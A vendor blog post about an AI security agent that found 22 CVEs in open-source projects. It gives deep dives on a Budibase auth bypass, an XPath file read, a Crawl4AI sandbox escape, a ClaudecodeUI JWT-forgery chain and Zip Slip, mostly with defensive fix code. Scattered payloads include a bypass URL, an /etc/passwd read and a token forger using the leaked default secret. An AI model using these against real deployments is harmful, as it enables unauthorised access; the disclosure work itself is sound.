The practical reality for a security team deploying AI is messier than the headlines or early POC results suggest. Noise compounds fast. Anthropic brought in external security researchers to help validate the volume of results. OpenAI heard from maintainers that the challenge isn't too few vulnerability reports, but too many low-quality ones. For anyone trying to operationalize LLMs, this should sound familiar: LLMs produce great findings, but without a verification loop, more scanning just creates more triage, not more security.
ProjectDiscovery has spent five years building open source security tooling and working alongside the researchers who use it. We built Neo to close the gap between finding vulnerabilities and proving them. In our recent benchmark against Claude Code and traditional SAST/DAST tools on AI-generated applications, Neo found 60% more vulnerabilities with 80% fewer false positives. That is because it doesn't just reason about code: it also deploys applications, tests them at runtime, and produces pentest-grade evidence.
So we put Neo to the test. Could it reason through popular, actively maintained repositories, find complex vulnerabilities, and deliver high-signal results without hours of manual triage?
We pointed Neo at trending open source projects, many with tens of thousands of GitHub stars, without telling it what to look for.
Neo cloned each repo, reasoned through the codebase, and validated findings end-to-end by deploying applications and building working exploits. Sessions ranged from about 30 minutes to nearly 4 hours depending on codebase size. Our team's only job was submitting the confirmed results to the affected projects.
Neo produced 22 confirmed CVEs across 13 projects with a false positive rate of roughly 10-20%, and more findings are still in the disclosure process. Neo surfaced complex vulnerabilities like sandbox escapes and multi-step exploit chains. Each came with a working proof-of-concept exploit and pentest-grade evidence, such as out-of-band (OAST) callbacks and confirmed file reads.
Here's the full list, followed by deep dives on five findings that show what this kind of reasoning looks like in practice.
All vulnerabilities have been reported to affected projects. Most have been patched in the versions listed in the advisories linked from each CVE.
Budibase is a low-code platform for building internal tools. The auth bypass Neo found gives any unauthenticated user full access to every API endpoint in the application, including user management, data operations, and internal service queries.
The bug is in packages/server/src/middleware/authorized.ts. Budibase exempts webhook endpoints from authentication because webhooks need to be callable without user sessions. The middleware decides whether a request is a webhook by running a regex test against the request URL.
In Koa (the HTTP framework Budibase uses), ctx.request.url is the full request URL, including the query string. The regex test runs against that entire string, not just the path. As a result, appending ?/webhooks/trigger to any endpoint makes the regex match, and the middleware skips all JWT validation, role checks, and CSRF protection.
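The minimal Python sketch below makes the Koa detail concrete. Both patterns are hypothetical stand-ins, not Budibase's actual regex. The "safer" check shows one possible fix under that assumption. It first drops the query string, keeping only the bare path that Koa exposes as ctx.path. It then anchors the match so the route has to start at the beginning of that path.

```python
import re
from urllib.parse import urlsplit

# Hypothetical webhook pattern for illustration; Budibase's real regex may differ.
WEBHOOK_RE = re.compile(r"/webhooks/(trigger|schema)")

# Hypothetical anchored form of the same route, used by the safer check.
WEBHOOK_PATH_RE = re.compile(r"^/api/webhooks/(trigger|schema)(/|$)")


def is_webhook_buggy(request_url: str) -> bool:
    """Mirrors the bug class: Koa's ctx.request.url is path plus query string,
    so an unanchored search is satisfied by a trailing "?/webhooks/trigger"."""
    return WEBHOOK_RE.search(request_url) is not None


def is_webhook_safer(request_url: str) -> bool:
    """Drops the query string first (Koa exposes the bare path as ctx.path)
    and requires the route to match from the start of the path."""
    path = urlsplit(request_url).path
    return WEBHOOK_PATH_RE.match(path) is not None


if __name__ == "__main__":
    probe = "/api/global/users?/webhooks/trigger"
    print(is_webhook_buggy(probe))  # True: auth would be skipped
    print(is_webhook_safer(probe))  # False: auth still applies
```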
How Neo found it. Neo first indexed the entire Budibase codebase: 45+ controllers, 15 integrations, and multiple middleware chains. It mapped every auth boundary (authorized.ts, authenticated.ts, builderOnly.ts, csrf.ts, and the publicRoutes group). When it read authorized.ts, it found isWebhookEndpoint() and checked exactly what ctx.request.url contains in Koa. It recognized that the regex would match against the query string and tested the bypass. It then confirmed that a protected endpoint that had returned 401 now returned 200.
Neo then mapped the full blast radius. It enumerated all users, escalated a regular user to admin via the PATCH /api/global/users endpoint, and chained the bypass with an SSRF in /api/queries/import/info to reach internal infrastructure. From the SSRF chain, it confirmed CouchDB was reachable at couchdb-service:5984 and mapped the internal Docker network: worker at 172.18.0.7, app at 172.18.0.8, proxy at 172.18.0.9.
Why this is hard to catch. The logic is correct in intent. Webhooks genuinely need to bypass auth, and the regex looks right when you read it. Catching the actual bug requires knowing a Koa implementation detail about what ctx.request.url includes, then testing a URL-parsing bypass condition that no standard auth testing covers.
changedetection.io is a self-hosted tool for monitoring websites for changes. Users can set XPath expressions as content filters. The expression is passed directly to elementpath.select() using XPath3Parser.
Unlike XPath 1.0, XPath 3.0 includes functions that read files and HTTP resources. unparsed-text(), for example, returns the contents of a file as a string. There's no function denylist between user input and the parser.
On any default changedetection.io instance (which ships with no authentication), an attacker can create a watch whose filter calls unparsed-text() on a local file. Triggering a check then returns the file contents inline in the snapshot output.
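A function denylist is the control missing between user input and the parser. The sketch below is a rough, hypothetical pre-parse check in Python. It is not changedetection.io's code or its actual fix. It flags calls to XPath 3.0/3.1 functions that reach files, URLs, or the environment. It also catches named function references like unparsed-text#1 and the dynamic function-lookup(), which could otherwise get past a check that only looks for direct calls. String-matching denylists are brittle. When a feature needs only XPath 1.0, parsing with an XPath 1.0 grammar removes these functions entirely.

```python
import re

# XPath 3.0/3.1 functions that can read files, URLs, or the environment.
# A hypothetical, non-exhaustive list for illustration.
RESOURCE_FUNCTIONS = (
    "unparsed-text",
    "unparsed-text-lines",
    "unparsed-text-available",
    "doc",
    "doc-available",
    "collection",
    "uri-collection",
    "json-doc",
    "environment-variable",
    "available-environment-variables",
    # Dynamic lookup could fetch any of the functions above by name at runtime.
    "function-lookup",
)

# A listed name that is not the tail of a longer name (so "fn:doc" matches but
# "my-doc" does not), followed by "(" for a direct call or "#" for a named
# function reference such as unparsed-text#1.
_CALL_RE = re.compile(
    r"(?<![\w.-])(?:" + "|".join(map(re.escape, RESOURCE_FUNCTIONS)) + r")\s*[(#]"
)


def contains_resource_function(expr: str) -> bool:
    """Return True if a user-supplied XPath expression appears to call a
    resource-reading function. Conservative: names inside string literals are
    flagged too, which errs toward rejecting the filter."""
    return _CALL_RE.search(expr) is not None


if __name__ == "__main__":
    print(contains_resource_function("unparsed-text('/etc/passwd')"))  # True
    print(contains_resource_function("//div[@id='price']/text()"))  # False
```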
How Neo found it. Neo traced the XPath processing pipeline from the watch configuration UI down to html_tools.py line 213. It identified the parser class as XPath3Parser and then checked what capabilities XPath 3.0 adds over XPath 1.0, finding that unparsed-text() provides filesystem and HTTP access. It tested the payload and got the file contents back in the snapshot output.
Neo's approach was capability mapping against the library's specification rather than code pattern matching. It asked "what can this parser do?" not just "does untrusted input reach it?"
Why this is hard to catch. The code is doing exactly what it's supposed to: parsing a user-supplied XPath expression. The risk isn't in the code pattern but in what the XPath 3.0 specification permits. File access through unparsed-text() is a spec-level capability that almost nobody outside of XML tooling specialists knows about, and there's no SAST rule for it.
Crawl4AI is a popular web crawling framework with an API server. Its /crawl endpoint accepts a hooks parameter containing user-supplied Python code. That code runs inside exec() with what looks like a sandboxed allowlist of builtins.
The developer built a sandbox. A reviewer seeing an allowlist with only two entries might reasonably conclude the sandbox is restrictive. But __import__ is Python's module loading function. Once it's available inside exec(), you can import os, subprocess, socket, the entire standard library. The allowlist is defeated by its first entry.
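A minimal Python sketch reproduces the failure mode. run_hook is a hypothetical helper, not Crawl4AI's hook_manager.py. The post doesn't name the allowlist's second entry, so len stands in as a harmless placeholder. With __import__ present, an ordinary import statement inside exec() loads os. Without it, the same statement raises ImportError.

```python
def run_hook(source: str, allowed_builtins: dict) -> dict:
    """Hypothetical stand-in for a hook runner: executes user code with a
    restricted builtins mapping and returns the resulting namespace."""
    namespace = {"__builtins__": allowed_builtins}
    exec(source, namespace)
    return namespace


# The post doesn't name the allowlist's second entry; len is a placeholder.
ALLOWLIST = {"__import__": __import__, "len": len}

# An `import` statement inside exec() resolves __import__ from the namespace's
# __builtins__, so this one entry unlocks the whole standard library.
PAYLOAD = "import os\nresult = os.sep"

if __name__ == "__main__":
    print(run_hook(PAYLOAD, ALLOWLIST)["result"])  # os was imported in the "sandbox"
    try:
        run_hook(PAYLOAD, {"len": len})
    except ImportError as exc:
        print("blocked:", exc)
```

Removing __import__ alone would not make this safe. Restricted builtins are not a reliable Python sandbox, because untrusted code can still reach dangerous objects through attribute introspection. Running hook code in a separate, OS-isolated process is a sturdier boundary.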
How Neo found it. Neo found the exec() call in hook_manager.py and didn't just flag it generically. It read the allowed_builtins list and reasoned about what each entry actually permits at runtime, identifying __import__ specifically as negating the entire sandbox. It traced the full path from POST /crawl through the hooks parameter to the exec call, built an OAST payload, and got the callback confirming code execution with the container hostname and internal IP. In the same session, Neo found three more RCE vectors in the same codebase.
Why this is hard to catch. An allowlist is a security control, and its presence signals that someone thought about the problem. SAST tools flag exec() generically, but they don't evaluate whether the builtins dictionary actually constrains anything. The distinction between "sandbox exists" and "sandbox works" requires understanding what __import__ does at runtime.
ClaudecodeUI is a web-based interface for Claude Code that exposes your development environment remotely. Neo found three independent bugs that chain to unauthenticated remote code execution on any default deployment.
Bug 1: Hardcoded JWT secret. The server uses a fallback secret ('claude-ui-dev-secret-change-in-production') when the environment variable isn't set. The variable isn't in .env.example, so users following the README never see a prompt to change it.
Bug 2: Platform mode auth bypass. A separate code path bypasses all authentication entirely, assigning a generic platform-user identity to every request.
Bug 3: No per-message auth on WebSocket shell. verifyClient checks the JWT once during the WebSocket upgrade handshake but never re-validates on subsequent messages. The shell handler writes directly to the PTY process with no further checks.
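Bug 3 is the gap between authenticating a connection once and authorizing each operation on it. The Python sketch below models a per-message check. ShellSession, its validate hook, and the list that stands in for the PTY are all hypothetical and are not ClaudecodeUI's code. Every incoming message is re-validated before anything reaches the shell. In this sketch the validator is injected and checks revocation; a real one would also check the token's signature and expiry.

```python
from dataclasses import dataclass, field
from typing import Callable, List, Optional


@dataclass
class ShellSession:
    """Hypothetical WebSocket shell session that authorizes every message."""

    token: str
    # Returns the token's claims if it is still valid (signature, expiry,
    # revocation), otherwise None. Injected so the check can be swapped out.
    validate: Callable[[str], Optional[dict]]
    pty_input: List[str] = field(default_factory=list)  # stand-in for the PTY

    def on_message(self, data: str) -> bool:
        # Re-validate on each message instead of trusting the upgrade handshake.
        if self.validate(self.token) is None:
            return False  # a real server would also close the socket here
        self.pty_input.append(data)
        return True


if __name__ == "__main__":
    revoked: set = set()
    session = ShellSession("tok-123", lambda t: None if t in revoked else {"sub": "user"})
    print(session.on_message("ls"))  # True: token still valid
    revoked.add("tok-123")
    print(session.on_message("id"))  # False: rejected after revocation
    print(session.pty_input)  # ['ls']
```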
How Neo found it. Neo found the JWT fallback in server/middleware/auth.js, cross-referenced against .env.example to confirm the variable wasn't documented, forged a token with the default secret, and confirmed it worked. It then traced what an authenticated WebSocket session can do, finding that the shell handler writes directly to a PTY with no re-validation after the initial connection. It also independently discovered the platform mode bypass and a command injection where user input gets concatenated into a shell command with no sanitization.
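Forging a token from a known secret needs nothing beyond the standard library. This Python sketch signs an HS256 JWT with the fallback secret quoted above. The claim names (userId, username) are hypothetical, because the post doesn't describe ClaudecodeUI's token payload. verify_hs256 is a simplified stand-in for any server that checks signatures against the same fallback secret.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# The fallback secret quoted in the post.
FALLBACK_SECRET = "claude-ui-dev-secret-change-in-production"


def b64url(data: bytes) -> str:
    # JWT segments use unpadded base64url encoding.
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def sign_hs256(claims: dict, secret: str) -> str:
    header = {"alg": "HS256", "typ": "JWT"}
    segments = [
        b64url(json.dumps(header, separators=(",", ":")).encode()),
        b64url(json.dumps(claims, separators=(",", ":")).encode()),
    ]
    signing_input = ".".join(segments).encode("ascii")
    signature = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
    return ".".join(segments + [b64url(signature)])


def verify_hs256(token: str, secret: str) -> Optional[dict]:
    """Simplified verifier: returns the claims if the HMAC matches, else None."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
    except ValueError:
        return None
    signing_input = f"{header_b64}.{payload_b64}".encode("utf-8")
    expected = b64url(hmac.new(secret.encode(), signing_input, hashlib.sha256).digest())
    if not hmac.compare_digest(expected.encode("ascii"), sig_b64.encode("utf-8")):
        return None
    padded = payload_b64 + "=" * (-len(payload_b64) % 4)
    return json.loads(base64.urlsafe_b64decode(padded))


if __name__ == "__main__":
    # Hypothetical claims; any payload signed with the fallback secret verifies.
    forged = sign_hs256({"userId": 1, "username": "admin"}, FALLBACK_SECRET)
    print(verify_hs256(forged, FALLBACK_SECRET))
```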
Why this is hard to catch. Each bug individually looks like a reasonable design decision. Catching the chain requires asking not just "is auth implemented?" but "is auth enforced at every operation boundary?"
The /import endpoint in changedetection.io (~30,700 GitHub stars) restores backup archives. This finding is rated Critical: the endpoint has no authentication and uses Python's zipfile.extractall() with no path validation.
ZIP members with paths containing ../ sequences write outside the intended directory. An attacker can craft a ZIP with a member that overwrites a Python module the application imports (like changedetectionio/__init__.py). That achieves RCE the next time the module is loaded.
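The path validation the endpoint lacks takes only a few lines of Python. safe_extract and build_zip are hypothetical helpers, not changedetection.io's fix. safe_extract resolves each member's target path and rejects the whole archive if any member would land outside the destination. That covers ../ sequences, absolute names, and symlinked parent directories.

```python
import io
import os
import tempfile
import zipfile
from typing import Dict, List


def safe_extract(archive: zipfile.ZipFile, dest: str) -> List[str]:
    """Hypothetical helper: extract `archive` into `dest` only if every member
    resolves to a path inside `dest` (the check a Zip Slip fix needs)."""
    root = os.path.realpath(dest)
    # Validate every member before writing anything, so a malicious archive
    # is rejected as a whole instead of being partially extracted.
    for name in archive.namelist():
        target = os.path.realpath(os.path.join(root, name))
        if os.path.commonpath([root, target]) != root:
            raise ValueError(f"blocked path outside destination: {name!r}")
    archive.extractall(root)
    return archive.namelist()


def build_zip(members: Dict[str, str]) -> zipfile.ZipFile:
    """Build an in-memory archive; member names such as ../x are stored as given."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, text in members.items():
            zf.writestr(name, text)
    buf.seek(0)
    return zipfile.ZipFile(buf)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        print(safe_extract(build_zip({"watches/a.json": "{}"}), tmp))
        try:
            safe_extract(build_zip({"../changedetectionio/__init__.py": "..."}), tmp)
        except ValueError as exc:
            print(exc)
```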
How Neo found it. Backup and restore endpoints are high-priority targets in Neo's analysis because they're typically written quickly, assumed to be admin-only, and rarely security-reviewed. Neo found the /import endpoint, confirmed it had no authentication, recognized the Zip Slip pattern, and generated a proof-of-concept ZIP that confirmed arbitrary file write outside the temporary directory.
We've been building AI automation on top of our security toolchain since 2024, and we spent a long time learning exactly where the model stops being useful. Models are excellent at forming hypotheses about what might be vulnerable. Acting on those hypotheses requires purpose-built infrastructure that a general-purpose agent doesn't have: deploying an application, injecting a payload, and observing whether the server made an outbound request to a callback URL.
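The last step in that loop is observing an outbound callback. A toy out-of-band listener in Python can illustrate it. CallbackListener and simulate_target_request are hypothetical names. The listener binds to 127.0.0.1 for demonstration, whereas a real OAST setup uses an externally reachable DNS/HTTP endpoint. Each probe gets a unique token, so a hit on that token's URL ties the callback to one specific payload.

```python
import http.server
import secrets
import threading
import urllib.request
from typing import List, Tuple


class CallbackListener:
    """Toy out-of-band listener: records the path of every HTTP GET it receives."""

    def __init__(self) -> None:
        self.hits: List[str] = []
        listener = self

        class Handler(http.server.BaseHTTPRequestHandler):
            def do_GET(self) -> None:
                listener.hits.append(self.path)  # record before responding
                self.send_response(204)
                self.end_headers()

            def log_message(self, *args) -> None:  # keep output quiet
                pass

        # Port 0 lets the OS pick a free port.
        self.server = http.server.ThreadingHTTPServer(("127.0.0.1", 0), Handler)
        threading.Thread(target=self.server.serve_forever, daemon=True).start()

    def new_callback_url(self) -> Tuple[str, str]:
        # A unique token per probe links any callback to one payload.
        token = secrets.token_hex(8)
        host, port = self.server.server_address[:2]
        return token, f"http://{host}:{port}/{token}"

    def was_triggered(self, token: str) -> bool:
        return f"/{token}" in self.hits

    def close(self) -> None:
        self.server.shutdown()
        self.server.server_close()


def simulate_target_request(url: str) -> None:
    """Stand-in for a vulnerable server fetching an attacker-supplied URL."""
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))  # no env proxies
    with opener.open(url, timeout=5):
        pass


if __name__ == "__main__":
    listener = CallbackListener()
    token, url = listener.new_callback_url()
    simulate_target_request(url)
    print(listener.was_triggered(token))  # True once the callback arrives
    listener.close()
```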
Neo runs on the latest frontier models, with 30+ agent-native tools built on the ProjectDiscovery toolchain. Each session runs inside an isolated sandbox with its own network stack, browser, and the same security tooling that 100,000+ practitioners already trust. The result is an agent that operates like a researcher in their own lab: form a hypothesis, test it against a live application, capture evidence.
For security teams, this is what Neo is built for: the auth bypasses, sandbox escapes, and logic flaws that matter most but take the longest to find and prove. The 22 CVEs in this post arrived confirmed, with evidence, ready to act on. That's the difference between security automation that compounds and security automation that generates more work.
These 22 CVEs are just the start. We have a growing number of findings working through the disclosure process, and we're continuing to run Neo against open source targets and work with maintainers on fixes. At the rate that AI-adjacent software is being written and deployed, the gap between what's shipping and what's been audited is only going to widen. We hope Neo can help bridge it.
This research also showed us where to focus next. Some vulnerability classes exposed gaps where dedicated sub-agents with class-specific validation logic would produce better signal. Projects with complex dependency chains were harder to deploy autonomously, which limited what Neo could validate at runtime. Both are active areas of development.
Our mission is straightforward: surface real security risk that matters, without the noise that buries it. If you maintain a project and want Neo to look at your codebase, reach out: https://projectdiscovery.io/request-demo. And if you've been building security automation yourself and know firsthand how hard it is to get past the demo stage, come take a look at what we've built. We're just getting started.
Going to #RSAC? Curious what Neo can really do? Don't just take our word for it: try it yourself. Start here: https://projectdiscovery.io/events/rsac-2026